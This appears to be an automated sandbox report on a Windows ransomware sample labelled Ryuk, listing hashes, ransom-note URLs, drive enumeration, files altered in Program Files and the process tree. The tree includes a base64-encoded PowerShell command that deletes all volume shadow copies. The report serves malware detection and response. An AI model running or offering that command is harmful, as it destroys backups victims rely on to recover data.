Analysis
-
max time kernel
170s -
max time network
178s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
24-01-2022 01:19
Static task
static1
Behavioral task
behavioral1
Sample
adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe
Resource
win10-en-20211208
General
-
Target
adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe
-
Size
166KB
-
MD5
ae6cea145c9f39c5b318a82b796736e6
-
SHA1
4d55570bdba189d703c16a65ecbc6148cd426e14
-
SHA256
adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e
-
SHA512
fe9dd654a75bf1dcc004a4bb7841892ecc48004721aae6b7d3ee5e5dc79aac29175e81d14d053ee01b2cc9a98bd329fa3910b3eaa2e20bab6e382fbbfdc1fb80
Malware Config
Extracted
C:\s7n6vr-readme.txt
ryuk
https://www.coveware.com/blog/2019/7/15/ransomware-amounts-rise-3x-in-q2-as-ryuk-amp-sodinokibi-spread
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/2B15DEB17BA691ED
http://decryptor.cc/2B15DEB17BA691ED
https://filehippo.com/download_tor_browser_for_windows/
Signatures
-
Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File opened (read-only) \??\K: adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File opened (read-only) \??\O: adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File opened (read-only) \??\P: adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File opened (read-only) \??\V: adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File opened (read-only) \??\B: adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File opened (read-only) \??\G: adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File opened (read-only) \??\I: adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File opened (read-only) \??\N: adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File opened (read-only) \??\T: adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File opened (read-only) \??\X: adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File opened (read-only) \??\Z: adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File opened (read-only) \??\E: adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File opened (read-only) \??\M: adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File opened (read-only) \??\W: adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File opened (read-only) \??\Y: adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File opened (read-only) \??\L: adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File opened (read-only) \??\H: adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File opened (read-only) \??\J: adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File opened (read-only) \??\Q: adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File opened (read-only) \??\R: adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File opened (read-only) \??\S: adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File opened (read-only) \??\U: adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File opened (read-only) \??\A: adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe -
Drops file in Program Files directory 32 IoCs
description ioc Process File opened for modification \??\c:\program files\PingImport.js adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File opened for modification \??\c:\program files\ReadStep.inf adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File opened for modification \??\c:\program files\SetSearch.rtf adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File opened for modification \??\c:\program files\CheckpointOut.emz adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File opened for modification \??\c:\program files\NewSearch.M2V adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File opened for modification \??\c:\program files\SelectConvert.vbe adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File created \??\c:\program files (x86)\s7n6vr-readme.txt adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File opened for modification \??\c:\program files\FindDisable.avi adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File opened for modification \??\c:\program files\MoveUnlock.ods adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File opened for modification \??\c:\program files\SkipBackup.jpg adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File opened for modification \??\c:\program files\TraceInitialize.vb adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File opened for modification \??\c:\program files\FindTest.ps1xml adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File opened for modification \??\c:\program files\SearchEdit.xlt adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File opened for modification \??\c:\program files\SearchWatch.mov adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File opened for modification \??\c:\program files\UnpublishWrite.xlsb adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File opened for modification \??\c:\program files\UpdateLock.xml adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File opened for modification \??\c:\program files\WatchResize.ini adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File opened for modification \??\c:\program files\RenameConvert.png adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File opened for modification \??\c:\program files\SubmitStop.php adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File opened for modification \??\c:\program files\UnlockMount.TTS adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File opened for modification \??\c:\program files\DisconnectSplit.jpe adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File opened for modification \??\c:\program files\SendInvoke.inf adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File opened for modification \??\c:\program files\CheckpointWatch.midi adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File opened for modification \??\c:\program files\ConnectUnlock.temp adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File opened for modification \??\c:\program files\DebugRestore.DVR adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File opened for modification \??\c:\program files\RequestConvertFrom.vdw adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File created \??\c:\program files\s7n6vr-readme.txt adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File opened for modification \??\c:\program files\ClearConvertFrom.aif adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File opened for modification \??\c:\program files\ConnectRevoke.emz adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File opened for modification \??\c:\program files\OptimizeSplit.jtx adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File opened for modification \??\c:\program files\StopEnable.xltx adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe File opened for modification \??\c:\program files\UpdateRestore.rm adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2704 adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe 2704 adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe 1504 powershell.exe 1504 powershell.exe 1504 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 2704 adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe Token: SeDebugPrivilege 1504 powershell.exe Token: SeBackupPrivilege 1920 vssvc.exe Token: SeRestorePrivilege 1920 vssvc.exe Token: SeAuditPrivilege 1920 vssvc.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 2704 wrote to memory of 1504 2704 adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe 73 PID 2704 wrote to memory of 1504 2704 adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe 73
Processes
-
C:\Users\Admin\AppData\Local\Temp\adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe"C:\Users\Admin\AppData\Local\Temp\adbc8ca7ca54b8a91955af1d93f090a44ce5dd4d8fbc4ccc182857f67aed554e.exe"1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2704 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1504
-
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:1236
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1920